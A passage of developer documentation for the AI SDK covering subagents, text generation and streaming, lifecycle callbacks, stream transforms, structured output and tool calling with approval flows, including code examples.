                  {part.state !== 'input-streaming' && (
                    <div>Research: {part.input.task}</div>
                  )}
                  {part.state === 'output-available' && (
                    <div>
                      {part.output.parts.map((nestedPart, i) => {
                        switch (nestedPart.type) {
                          case 'text':
                            return <p key={i}>{nestedPart.text}</p>;
                          default:
                            return null;
                        }
                      })}
                    </div>
                  )}
                </div>
              );
            default:
              return null;
          }
        }),
      )}
    </div>
  );
}

Caveats

No Tool Approvals in Subagents

Subagent tools cannot use needsApproval. All tools must execute automatically without user confirmation.

Subagent Context is Isolated

Each subagent invocation starts with a fresh context window. This is one of the key benefits of subagents: they don't inherit the accumulated context from the main agent, which is exactly what allows them to do heavy exploration without bloating the main conversation.

If you need to give a subagent access to the conversation history, the messages are available in the tool's execute function alongside abortSignal:

execute: async ({ task }, { abortSignal, messages }) => {
  const result = await researchSubagent.generate({
    messages: [
      ...messages, // The main agent's conversation history
      { role: 'user', content: task }, // The specific task for this invocation
    ],
    abortSignal,
  });
  return result.text;
},

Use this sparingly since passing full history defeats some of the context isolation benefits.

Streaming Adds Complexity

The basic pattern (no streaming) is simpler to implement and debug. Only add streaming when you need to show real-time progress in the UI.

title: Agents description: An overview of building agents with the AI SDK.

Agents

The following section shows you how to build agents with the AI SDK - systems where large language models (LLMs) use tools in a loop to accomplish tasks.

title: Overview description: An overview of AI SDK Core.

AI SDK Core

For example, here’s how you can generate text with various models using the AI SDK:

AI SDK Core Functions

generateText: Generates text and tool calls. This function is ideal for non-interactive use cases such as automation tasks where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
streamText: Stream text and tool calls. You can use the streamText function for interactive use cases such as chat bots and content streaming.

Both generateText and streamText support structured output via the output property (e.g. Output.object(), Output.array()), allowing you to generate typed, schema-validated data for information extraction, synthetic data generation, classification tasks, and streaming generated UIs.

API Reference

Please check out the AI SDK Core API Reference for more details on each function.

title: Generating Text description: Learn how to generate text with the AI SDK.

Generating and Streaming Text

The AI SDK Core provides two functions to generate text and stream it from LLMs:

generateText: Generates text for a given prompt and model.
streamText: Streams text from a given prompt and model.

Advanced LLM features such as tool calling and structured data generation are built on top of text generation.

`generateText`

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can use more advanced prompts to generate text with more complex instructions and content:

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  system:
    'You are a professional writer. ' +
    'You write simple, clear, and concise content.',
  prompt: `Summarize the following article in 3-5 sentences: ${article}`,
});

The result object of generateText contains several promises that resolve when all required data is available:

result.content: The content that was generated in the last step.
result.text: The generated text.
result.reasoning: The full reasoning that the model has generated in the last step.
result.reasoningText: The reasoning text of the model (only available for some models).
result.files: The files that were generated in the last step.
result.sources: Sources that have been used as references in the last step (only available for some models).
result.toolCalls: The tool calls that were made in the last step.
result.toolResults: The results of the tool calls from the last step.
result.finishReason: The reason the model finished generating text.
result.rawFinishReason: The raw reason why the generation finished (from the provider).
result.usage: The usage of the model during the final step of text generation.
result.totalUsage: The total usage across all steps (for multi-step generations).
result.warnings: Warnings from the model provider (e.g. unsupported settings).
result.request: Additional request information.
result.response: Additional response information, including response messages and body.
result.providerMetadata: Additional provider-specific metadata.
result.steps: Details for all steps, useful for getting information about intermediate steps.
result.output: The generated structured output using the output specification.

Accessing response headers & body

Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.

You can access the raw response headers and body using the response property:

import { generateText } from 'ai';

const result = await generateText({
  // ...
});

console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));

`onFinish` callback

When using generateText, you can provide an onFinish callback that is triggered after the last step is finished ( API Reference ). It contains the text, usage information, finish reason, messages, steps, total usage, and more:

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
    // your own logic, e.g. for saving the chat history or recording usage

    const messages = response.messages; // messages that were generated
  },
});

Lifecycle callbacks (experimental)

generateText provides several experimental lifecycle callbacks that let you hook into different phases of the generation process. These are useful for logging, observability, debugging, and custom telemetry. Errors thrown inside these callbacks are silently caught and do not break the generation flow.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  prompt: 'What is the weather in San Francisco?',
  tools: {
    // ... your tools
  },

  experimental_onStart({ model, settings, functionId }) {
    console.log('Generation started', { model, functionId });
  },

  experimental_onStepStart({ stepNumber, model, promptMessages }) {
    console.log(`Step ${stepNumber} starting`, { model: model.modelId });
  },

  experimental_onToolCallStart({ toolName, toolCallId, input }) {
    console.log(`Tool call starting: ${toolName}`, { toolCallId });
  },

  experimental_onToolCallFinish({ toolName, durationMs, error }) {
    console.log(`Tool call finished: ${toolName} (${durationMs}ms)`, {
      success: !error,
    });
  },

  onStepFinish({ stepNumber, finishReason, usage }) {
    console.log(`Step ${stepNumber} finished`, { finishReason, usage });
  },
});

The available lifecycle callbacks are:

experimental_onStart: Called once when the generateText operation begins, before any LLM calls. Receives model info, prompt, settings, and telemetry metadata.
experimental_onStepStart: Called before each step (LLM call). Receives the step number, model, prompt messages being sent, tools, and prior steps.
experimental_onToolCallStart: Called right before a tool's execute function runs. Receives the tool name, call ID, and input.
experimental_onToolCallFinish: Called right after a tool's execute function completes or errors. Receives the tool name, call ID, input, output (or undefined on error), error (or undefined on success), and durationMs.
onStepFinish: Called after each step finishes. Now also includes stepNumber (zero-based index of the completed step).

`streamText`

AI SDK Core provides the streamText function which simplifies streaming text from LLMs:

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
});

// example: use textStream as an async iterable
for await (const textPart of result.textStream) {
  console.log(textPart);
}

You can use streamText on its own or in combination with AI SDK UI and AI SDK RSC. The result object contains several helper functions to make the integration into AI SDK UI easier:

result.toUIMessageStreamResponse(): Creates a UI Message stream HTTP response (with tool calls etc.) that can be used in a Next.js App Router API route.
result.pipeUIMessageStreamToResponse(): Writes UI Message stream delta output to a Node.js response-like object.
result.toTextStreamResponse(): Creates a simple text stream HTTP response.
result.pipeTextStreamToResponse(): Writes text delta output to a Node.js response-like object.

It also provides several promises that resolve when the stream is finished:

result.content: The content that was generated in the last step.
result.text: The generated text.
result.reasoning: The full reasoning that the model has generated.
result.reasoningText: The reasoning text of the model (only available for some models).
result.files: Files that have been generated by the model in the last step.
result.sources: Sources that have been used as references in the last step (only available for some models).
result.toolCalls: The tool calls that have been executed in the last step.
result.toolResults: The tool results that have been generated in the last step.
result.finishReason: The reason the model finished generating text.
result.rawFinishReason: The raw reason why the generation finished (from the provider).
result.usage: The usage of the model during the final step of text generation.
result.totalUsage: The total usage across all steps (for multi-step generations).
result.warnings: Warnings from the model provider (e.g. unsupported settings).
result.steps: Details for all steps, useful for getting information about intermediate steps.
result.request: Additional request information from the last step.
result.response: Additional response information from the last step.
result.providerMetadata: Additional provider-specific metadata from the last step.

`onError` callback

streamText immediately starts streaming to enable sending data without waiting for the model. Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.

To log errors, you can provide an onError callback that is triggered when an error occurs.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onError({ error }) {
    console.error(error); // your error logging logic here
  },
});

`onChunk` callback

When using streamText, you can provide an onChunk callback that is triggered for each chunk of the stream.

It receives the following chunk types:

text
reasoning
source
tool-call
tool-input-start
tool-input-delta
tool-result
raw

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onChunk({ chunk }) {
    // implement your own logic here, e.g.:
    if (chunk.type === 'text') {
      console.log(chunk.text);
    }
  },
});

`onFinish` callback

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
    // your own logic, e.g. for saving the chat history or recording usage

    const messages = response.messages; // messages that were generated
  },
});

Lifecycle callbacks (experimental)

streamText provides several experimental lifecycle callbacks that let you hook into different phases of the streaming process. These are useful for logging, observability, debugging, and custom telemetry. Errors thrown inside these callbacks are silently caught and do not break the streaming flow.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = streamText({
  model: __MODEL__,
  prompt: 'What is the weather in San Francisco?',
  tools: {
    // ... your tools
  },

  experimental_onStart({ model, system, prompt, messages }) {
    console.log('Streaming started', { model, prompt });
  },

  experimental_onStepStart({ stepNumber, model, messages }) {
    console.log(`Step ${stepNumber} starting`, { model: model.modelId });
  },

  experimental_onToolCallStart({ toolCall }) {
    console.log(`Tool call starting: ${toolCall.toolName}`, {
      toolCallId: toolCall.toolCallId,
    });
  },

  experimental_onToolCallFinish({ toolCall, durationMs, success, error }) {
    console.log(`Tool call finished: ${toolCall.toolName} (${durationMs}ms)`, {
      success,
    });
  },

  onStepFinish({ finishReason, usage }) {
    console.log('Step finished', { finishReason, usage });
  },
});

The available lifecycle callbacks are:

experimental_onStart: Called once when the streamText operation begins, before any LLM calls. Receives model info, prompt, settings, and telemetry metadata.
experimental_onStepStart: Called before each step (LLM call). Receives the step number, model, messages being sent, tools, and prior steps.
experimental_onToolCallStart: Called right before a tool's execute function runs. Receives the tool call object, messages, and context.
experimental_onToolCallFinish: Called right after a tool's execute function completes or errors. Receives the tool call object, durationMs, and a discriminated union with success/output or success/error.
onStepFinish: Called after each step finishes. Receives the finish reason, usage, and other step details.

`fullStream` property

import { streamText } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const result = streamText({
  model: __MODEL__,
  tools: {
    cityAttractions: {
      inputSchema: z.object({ city: z.string() }),
      execute: async ({ city }) => ({
        attractions: ['attraction1', 'attraction2', 'attraction3'],
      }),
    },
  },
  prompt: 'What are some San Francisco tourist attractions?',
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'start': {
      // handle start of stream
      break;
    }
    case 'start-step': {
      // handle start of step
      break;
    }
    case 'text-start': {
      // handle text start
      break;
    }
    case 'text-delta': {
      // handle text delta here
      break;
    }
    case 'text-end': {
      // handle text end
      break;
    }
    case 'reasoning-start': {
      // handle reasoning start
      break;
    }
    case 'reasoning-delta': {
      // handle reasoning delta here
      break;
    }
    case 'reasoning-end': {
      // handle reasoning end
      break;
    }
    case 'source': {
      // handle source here
      break;
    }
    case 'file': {
      // handle file here
      break;
    }
    case 'tool-call': {
      switch (part.toolName) {
        case 'cityAttractions': {
          // handle tool call here
          break;
        }
      }
      break;
    }
    case 'tool-input-start': {
      // handle tool input start
      break;
    }
    case 'tool-input-delta': {
      // handle tool input delta
      break;
    }
    case 'tool-input-end': {
      // handle tool input end
      break;
    }
    case 'tool-result': {
      switch (part.toolName) {
        case 'cityAttractions': {
          // handle tool result here
          break;
        }
      }
      break;
    }
    case 'tool-error': {
      // handle tool error
      break;
    }
    case 'finish-step': {
      // handle finish step
      break;
    }
    case 'finish': {
      // handle finish here
      break;
    }
    case 'error': {
      // handle error here
      break;
    }
    case 'raw': {
      // handle raw value
      break;
    }
  }
}

Stream transformation

You can use the experimental_transform option to transform the stream. This is useful for e.g. filtering, changing, or smoothing the text stream.

Smoothing streams

The AI SDK Core provides a smoothStream function that can be used to smooth out text and reasoning streaming.

import { smoothStream, streamText } from 'ai';

const result = streamText({
  model,
  prompt,
  experimental_transform: smoothStream(),
});

Custom transformations

Here is an example of how to implement a custom transformation that converts all text to uppercase:

import { streamText, type TextStreamPart, type ToolSet } from 'ai';

const upperCaseTransform =
  <TOOLS extends ToolSet>() =>
  (options: { tools: TOOLS; stopStream: () => void }) =>
    new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
      transform(chunk, controller) {
        controller.enqueue(
          // for text-delta chunks, convert the text to uppercase:
          chunk.type === 'text-delta'
            ? { ...chunk, text: chunk.text.toUpperCase() }
            : chunk,
        );
      },
    });

You can also stop the stream using the stopStream function. This is e.g. useful if you want to stop the stream when model guardrails are violated, e.g. by generating inappropriate content.

When you invoke stopStream, it is important to simulate the finish-step and finish events to guarantee that a well-formed stream is returned and all callbacks are invoked.

import { streamText, type TextStreamPart, type ToolSet } from 'ai';

const stopWordTransform =
  <TOOLS extends ToolSet>() =>
  ({ stopStream }: { stopStream: () => void }) =>
    new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
      // note: this is a simplified transformation for testing;
      // in a real-world version more there would need to be
      // stream buffering and scanning to correctly emit prior text
      // and to detect all STOP occurrences.
      transform(chunk, controller) {
        if (chunk.type !== 'text-delta') {
          controller.enqueue(chunk);
          return;
        }

        if (chunk.text.includes('STOP')) {
          // stop the stream
          stopStream();

          // simulate the finish-step event
          controller.enqueue({
            type: 'finish-step',
            finishReason: 'stop',
            rawFinishReason: 'stop',
            usage: {
              completionTokens: NaN,
              promptTokens: NaN,
              totalTokens: NaN,
            },
            response: {
              id: 'response-id',
              modelId: 'mock-model-id',
              timestamp: new Date(0),
            },
            providerMetadata: undefined,
          });

          // simulate the finish event
          controller.enqueue({
            type: 'finish',
            finishReason: 'stop',
            rawFinishReason: 'stop',
            totalUsage: {
              completionTokens: NaN,
              promptTokens: NaN,
              totalTokens: NaN,
            },
          });

          return;
        }

        controller.enqueue(chunk);
      },
    });

Multiple transformations

You can also provide multiple transformations. They are applied in the order they are provided.

const result = streamText({
  model,
  prompt,
  experimental_transform: [firstTransform, secondTransform],
});

Sources

Some providers such as Perplexity and Google Generative AI include sources in the response.

Currently sources are limited to web pages that ground the response. You can access them using the sources property of the result.

Each url source contains the following properties:

id: The ID of the source.
url: The URL of the source.
title: The optional title of the source.
providerMetadata: Provider metadata for the source.

When you use generateText, you can access the sources using the sources property:

const result = await generateText({
  model: 'google/gemini-2.5-flash',
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt: 'List the top 5 San Francisco news from the past week.',
});

for (const source of result.sources) {
  if (source.sourceType === 'url') {
    console.log('ID:', source.id);
    console.log('Title:', source.title);
    console.log('URL:', source.url);
    console.log('Provider metadata:', source.providerMetadata);
    console.log();
  }
}

When you use streamText, you can access the sources using the fullStream property:

const result = streamText({
  model: 'google/gemini-2.5-flash',
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt: 'List the top 5 San Francisco news from the past week.',
});

for await (const part of result.fullStream) {
  if (part.type === 'source' && part.sourceType === 'url') {
    console.log('ID:', part.id);
    console.log('Title:', part.title);
    console.log('URL:', part.url);
    console.log('Provider metadata:', part.providerMetadata);
    console.log();
  }
}

The sources are also available in the result.sources promise.

Examples

You can see generateText and streamText in action using various frameworks in the following examples:

`generateText`

`streamText`

title: Generating Structured Data description: Learn how to generate structured data with the AI SDK.

Generating Structured Data

The AI SDK standardises structured object generation across model providers using the output property on generateText and streamText. You can use Zod schemas, Valibot, or JSON schemas to specify the shape of the data that you want, and the AI model will generate data that conforms to that structure.

Generating Structured Outputs

Use generateText with Output.object() to generate structured data from a prompt. The schema is also used to validate the generated data, ensuring type safety and correctness.

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { output } = await generateText({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Accessing response headers & body

Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.

You can access the raw response headers and body using the response property:

import { generateText, Output } from 'ai';

const result = await generateText({
  // ...
  output: Output.object({ schema }),
});

console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));

Stream Structured Outputs

Given the added complexity of returning structured data, model response time can be unacceptable for your interactive use case. With streamText and output, you can stream the model's structured response as it is generated.

import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { partialOutputStream } = streamText({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

// use partialOutputStream as an async iterable
for await (const partialObject of partialOutputStream) {
  console.log(partialObject);
}

You can consume the structured output on the client with the useObject hook.

Error Handling in Streams

streamText starts streaming immediately. When errors occur during streaming, they become part of the stream rather than thrown exceptions (to prevent stream crashes).

To handle errors, provide an onError callback:

import { streamText, Output } from 'ai';

const result = streamText({
  // ...
  output: Output.object({ schema }),
  onError({ error }) {
    console.error(error); // log to your error tracking service
  },
});

For non-streaming error handling with generateText, see the Error Handling section below.

Output Types

The AI SDK supports multiple ways of specifying the expected structure of generated data via the Output object. You can select from various strategies for structured/text generation and validation.

`Output.text()`

Use Output.text() to generate plain text from a model. This option doesn't enforce any schema on the result: you simply receive the model's text as a string. This is the default behavior when no output is specified.

import { generateText, Output } from 'ai';

const { output } = await generateText({
  // ...
  output: Output.text(),
  prompt: 'Tell me a joke.',
});
// output will be a string (the joke)

`Output.object()`

Use Output.object({ schema }) to generate a structured object based on a schema (for example, a Zod schema). The output is type-validated to ensure the returned result matches the schema.

import { generateText, Output } from 'ai';
import { z } from 'zod';

const { output } = await generateText({
  // ...
  output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number().nullable(),
      labels: z.array(z.string()),
    }),
  }),
  prompt: 'Generate information for a test user.',
});
// output will be an object matching the schema above

`Output.array()`

Use Output.array({ element }) to specify that you expect an array of typed objects from the model, where each element should conform to a schema (defined in the element property).

import { generateText, Output } from 'ai';
import { z } from 'zod';

const { output } = await generateText({
  // ...
  output: Output.array({
    element: z.object({
      location: z.string(),
      temperature: z.number(),
      condition: z.string(),
    }),
  }),
  prompt: 'List the weather for San Francisco and Paris.',
});
// output will be an array of objects like:
// [
//   { location: 'San Francisco', temperature: 70, condition: 'Sunny' },
//   { location: 'Paris', temperature: 65, condition: 'Cloudy' },
// ]

When streaming arrays with streamText, you can use elementStream to receive each completed element as it is generated:

import { streamText, Output } from 'ai';
import { z } from 'zod';

const { elementStream } = streamText({
  // ...
  output: Output.array({
    element: z.object({
      name: z.string(),
      class: z.string(),
      description: z.string(),
    }),
  }),
  prompt: 'Generate 3 hero descriptions for a fantasy role playing game.',
});

for await (const hero of elementStream) {
  console.log(hero); // Each hero is complete and validated
}

`Output.choice()`

Use Output.choice({ options }) when you expect the model to choose from a specific set of string options, such as for classification or fixed-enum answers.

import { generateText, Output } from 'ai';

const { output } = await generateText({
  // ...
  output: Output.choice({
    options: ['sunny', 'rainy', 'snowy'],
  }),
  prompt: 'Is the weather sunny, rainy, or snowy today?',
});
// output will be one of: 'sunny', 'rainy', or 'snowy'

You can provide any set of string options, and the output will always be a single string value that matches one of the specified options. The AI SDK validates that the result matches one of your options, and will throw if the model returns something invalid.

This is especially useful for making classification-style generations or forcing valid values for API compatibility.

`Output.json()`

Use Output.json() when you want to generate and parse unstructured JSON values from the model, without enforcing a specific schema. This is useful if you want to capture arbitrary objects, flexible structures, or when you want to rely on the model's natural output rather than rigid validation.

import { generateText, Output } from 'ai';

const { output } = await generateText({
  // ...
  output: Output.json(),
  prompt:
    'For each city, return the current temperature and weather condition as a JSON object.',
});

// output could be any valid JSON, for example:
// {
//   "San Francisco": { "temperature": 70, "condition": "Sunny" },
//   "Paris": { "temperature": 65, "condition": "Cloudy" }
// }

With Output.json, the AI SDK only checks that the response is valid JSON; it doesn't validate the structure or types of the values. If you need schema validation, use the .object or .array outputs instead.

For more advanced validation or different structures, see the Output API reference.

Generating Structured Outputs with Tools

One of the key advantages of using structured output with generateText and streamText is the ability to combine it with tool calling.

import { generateText, Output, tool, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { output } = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather for a location',
      inputSchema: z.object({ location: z.string() }),
      execute: async ({ location }) => {
        // fetch weather data
        return { temperature: 72, condition: 'sunny' };
      },
    }),
  },
  output: Output.object({
    schema: z.object({
      summary: z.string(),
      recommendation: z.string(),
    }),
  }),
  stopWhen: stepCountIs(5),
  prompt: 'What should I wear in San Francisco today?',
});

Property Descriptions

You can add .describe("...") to individual schema properties to give the model hints about what each property is for. This helps improve the quality and accuracy of generated structured data:

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { output } = await generateText({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      name: z.string().describe('The name of the recipe'),
      ingredients: z
        .array(
          z.object({
            name: z.string(),
            amount: z
              .string()
              .describe('The amount of the ingredient (grams or ml)'),
          }),
        )
        .describe('List of ingredients with amounts'),
      steps: z.array(z.string()).describe('Step-by-step cooking instructions'),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Property descriptions are particularly useful for:

Clarifying ambiguous property names
Specifying expected formats or conventions
Providing context for complex nested structures

Output Name and Description

You can optionally specify a name and description for the output. These are used by some providers for additional LLM guidance, e.g. via tool or schema name.

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const { output } = await generateText({
  model: __MODEL__,
  output: Output.object({
    name: 'Recipe',
    description: 'A recipe for a dish.',
    schema: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This works with all output types that support structured generation:

Output.object({ name, description, schema })
Output.array({ name, description, element })
Output.choice({ name, description, options })
Output.json({ name, description })

Accessing Reasoning

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const result = await generateText({
  model: __MODEL__, // must be a reasoning model
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({
            name: z.string(),
            amount: z.string(),
          }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

console.log(result.reasoningText);

Error Handling

When generateText with structured output cannot generate a valid object, it throws a AI_NoObjectGeneratedError.

This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:

The model failed to generate a response.
The model generated a response that could not be parsed.
The model generated a response that could not be validated against the schema.

The error preserves the following information to help you log the issue:

text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
response: Metadata about the language model response, including response id, timestamp, and model.
usage: Request token usage.
cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.

import { generateText, Output, NoObjectGeneratedError } from 'ai';

try {
  await generateText({
    model,
    output: Output.object({ schema }),
    prompt,
  });
} catch (error) {
  if (NoObjectGeneratedError.isInstance(error)) {
    console.log('NoObjectGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Text:', error.text);
    console.log('Response:', error.response);
    console.log('Usage:', error.usage);
  }
}

More Examples

You can see structured output generation in action using various frameworks in the following examples:

`generateText` with Output

`streamText` with Output

title: Tool Calling description: Learn about tool calling and multi-step calls (using stopWhen) with AI SDK Core.

Tool Calling

As covered under Foundations, tools are objects that can be called by the model to perform a specific task. AI SDK Core tools contain several core elements:

description: An optional description of the tool that can influence when the tool is picked.
inputSchema: A Zod schema or a JSON schema that defines the input parameters. The schema is consumed by the LLM, and also used to validate the LLM tool calls.
execute: An optional async function that is called with the inputs from the tool call. It produces a value of type RESULT (generic type). It is optional because you might want to forward tool calls to the client or to a queue instead of executing them in the same process.
strict: (optional, boolean) Enables strict tool calling when supported by the provider

The tools parameter of generateText and streamText is an object that has the tool names as keys and the tools as values:

import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: stepCountIs(5),
  prompt: 'What is the weather in San Francisco?',
});

Tool calling is not restricted to only text generation. You can also use it to render user interfaces (Generative UI).

Strict Mode

When enabled, language model providers that support strict tool calling will only generate tool calls that are valid according to your defined inputSchema. This increases the reliability of tool calling. However, not all schemas may be supported in strict mode, and what is supported depends on the specific provider.

By default, strict mode is disabled. You can enable it per-tool by setting strict: true:

tool({
  description: 'Get the weather in a location',
  inputSchema: z.object({
    location: z.string(),
  }),
  strict: true, // Enable strict validation for this tool
  execute: async ({ location }) => ({
    // ...
  }),
});

Input Examples

You can specify example inputs for your tools to help guide the model on how input data should be structured. When supported by providers, input examples can help when JSON schema itself does not fully specify the intended usage or when there are optional values.

tool({
  description: 'Get the weather in a location',
  inputSchema: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  inputExamples: [
    { input: { location: 'San Francisco' } },
    { input: { location: 'London' } },
  ],
  execute: async ({ location }) => {
    // ...
  },
});

Tool Execution Approval

By default, tools with an execute function run automatically as the model calls them. You can require approval before execution by setting needsApproval:

import { tool } from 'ai';
import { z } from 'zod';

const runCommand = tool({
  description: 'Run a shell command',
  inputSchema: z.object({
    command: z.string().describe('The shell command to execute'),
  }),
  needsApproval: true,
  execute: async ({ command }) => {
    // your command execution logic here
  },
});

This is useful for tools that perform sensitive operations like executing commands, processing payments, modifying data, and more potentially dangerous actions.

How It Works

When a tool requires approval, generateText and streamText don't pause execution. Instead, they complete and return tool-approval-request parts in the result content. This means the approval flow requires two calls to the model: the first returns the approval request, and the second (after receiving the approval response) either executes the tool or informs the model that approval was denied.

Here's the complete flow:

Call generateText with a tool that has needsApproval: true
Model generates a tool call
generateText returns with tool-approval-request parts in result.content
Your app requests an approval and collects the user's decision
Add a tool-approval-response to the messages array
Call generateText again with the updated messages
If approved, the tool runs and returns a result. If denied, the model sees the denial and responds accordingly.

Handling Approval Requests

After calling generateText or streamText, check result.content for tool-approval-request parts:

import { type ModelMessage, generateText } from 'ai';

const messages: ModelMessage[] = [
  { role: 'user', content: 'Remove the most recent file' },
];
const result = await generateText({
  model: __MODEL__,
  tools: { runCommand },
  messages,
});

messages.push(...result.response.messages);

for (const part of result.content) {
  if (part.type === 'tool-approval-request') {
    console.log(part.approvalId); // Unique ID for this approval request
    console.log(part.toolCall); // Contains toolName, input, etc.
  }
}

To respond, create a tool-approval-response and add it to your messages:

import { type ToolApprovalResponse } from 'ai';

const approvals: ToolApprovalResponse[] = [];

for (const part of result.content) {
  if (part.type === 'tool-approval-request') {
    const response: ToolApprovalResponse = {
      type: 'tool-approval-response',
      approvalId: part.approvalId,
      approved: true, // or false to deny
      reason: 'User confirmed the command', // Optional context for the model
    };
    approvals.push(response);
  }
}

// add approvals to messages
messages.push({ role: 'tool', content: approvals });

Then call generateText again with the updated messages. If approved, the tool executes. If denied, the model receives the denial and can respond accordingly.

Dynamic Approval

You can make approval decisions based on tool input by providing an async function:

const paymentTool = tool({
  description: 'Process a payment',
  inputSchema: z.object({
    amount: z.number(),
    recipient: z.string(),
  }),
  needsApproval: async ({ amount }) => amount > 1000,
  execute: async ({ amount, recipient }) => {
    return await processPayment(amount, recipient);
  },
});

In this example, only transactions over $1000 require approval. Smaller transactions execute automatically.

Tool Execution Approval with useChat

When using useChat, the approval flow is handled through UI state. See Chatbot Tool Usage for details on handling approvals in your UI with addToolApprovalResponse.

Multi-Step Calls (using stopWhen)

The AI SDK provides several built-in stopping conditions:

stepCountIs(count) — stops after a specified number of steps (default: stepCountIs(20))
hasToolCall(toolName) — stops when a specific tool is called
isLoopFinished() — never triggers, letting the loop run until naturally finished

You can also combine multiple conditions in an array or create custom conditions. See Loop Control for more details.

By default, when you use generateText or streamText, it triggers a single generation. This works well for many use cases where you can rely on the model's training data to generate a response. However, when you provide tools, the model now has the choice to either generate a normal text response, or generate a tool call. If the model generates a tool call, its generation is complete and that step is finished.

Example

In the following example, there are two steps:

Step 1
1. The prompt 'What is the weather in San Francisco?' is sent to the model.
2. The model generates a tool call.
3. The tool call is executed.
Step 2
1. The tool result is sent to the model.
2. The model generates a response considering the tool result.

import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

const { text, steps } = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: stepCountIs(5), // stop after a maximum of 5 steps if tools were called
  prompt: 'What is the weather in San Francisco?',
});

You can use streamText in a similar way.

Steps

Example: Extract tool results from all steps

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { steps } = await generateText({
  model: __MODEL__,
  stopWhen: stepCountIs(10),
  // ...
});

// extract all tool calls from the steps:
const allToolCalls = steps.flatMap(step => step.toolCalls);

`onStepFinish` callback

The callback receives a stepNumber (zero-based) to identify which step just completed:

import { generateText } from 'ai';

const result = await generateText({
  // ...
  onStepFinish({
    stepNumber,
    text,
    toolCalls,
    toolResults,
    finishReason,
    usage,
  }) {
    console.log(`Step ${stepNumber} finished (${finishReason})`);
    // your own logic, e.g. for saving the chat history or recording usage
  },
});

Tool execution lifecycle callbacks

You can use experimental_onToolCallStart and experimental_onToolCallFinish to observe tool execution. These callbacks are called right before and after each tool's execute function, giving you visibility into tool execution timing, inputs, outputs, and errors:

